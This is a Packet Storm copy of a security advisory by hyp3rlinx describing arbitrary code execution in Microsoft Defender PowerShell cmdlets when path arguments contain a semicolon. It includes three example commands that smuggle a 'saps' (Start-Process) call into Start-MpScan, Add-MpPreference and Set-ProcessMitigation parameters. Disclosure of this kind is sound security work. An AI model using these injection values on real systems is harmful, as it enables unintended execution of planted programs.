Microsoft Defender Anti-Malware PowerShell API Arbitrary Code Execution ≈ Packet Storm

Microsoft Defender Anti-Malware PowerShell API Arbitrary Code Execution ≈ Packet Storm

Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]

Microsoft Defender Anti-Malware PowerShell API Arbitrary Code Execution[6]
Authored by hyp3rlinx[7] | Site hyp3rlinx.altervista.org[8]

Microsoft Defender API and PowerShell APIs suffer from an arbitrary code execution due to a flaw in powershell not handling user provided input that contains a semicolon.

SHA-256 | fe92bef621155fd9c83158e63e2b87c27bed041ce6cc8df753d8ab75d5fcd6af

Change Mirror[12] Download[13]

        [+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt
[+] twitter.com/hyp3rlinx
[+] x.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Windows PowerShell
[Vulnerability Type]
Arbitrary Code Execution
[CVE Reference]
N/A
[Security Issue]
Microsoft Defender Anti Malware and or PS API's can result in executing arbitrary code.
E.g. scan a directory, shortcut .lnk or even non-existent item, may execute unintended code.
This vector builds upon my previous advisory and subsequent project PSTrojanFile.
Requirements:
1) On CL 'powershell' cmd is prefixed or passed in by calling PowerShell from another script
2) Executable file of same name as the parameter that lives nearby
Examples:
powershell Start-MpScan -Scanpath "C:\Users\gg\Downloads\;saps Helper;.1.zip"
(Helper.exe lives on Desktop)
Create directory ";saps Test", Test.exe, Test.cmd etc is on same CL path
powershell Add-MpPreference -ControlledFolderAccessAllowedApplications ";saps Test"
Create directory with semicolon, drop PE file named doom.exe in same path.
powershell Set-ProcessMitigation -PolicyFilePath "test;saps doom"
TODO: Update PSTrojanFile
[References]
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
https://github.com/hyp3rlinx/PSTrojanFile
https://packetstormsecurity.com/files/153863/Microsoft-Windows-PowerShell-Command-Execution.html
https://www.exploit-db.com/exploits/47248
https://github.com/MicrosoftDocs/windows-powershell-docs/tree/main/docset/winserver2019-ps/defender
[Video PoC URL]
https://www.youtube.com/watch?v=0Go6yJiRWP8
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: circa (2019)
December 7, 2023 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

Login[14] or Register[15] to add favorites

File Archive:

December 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa

File Tags

File Archives

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services[120]
Hosting By
Rokasec[121]
close
Image

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.

 

"No secure path in the world"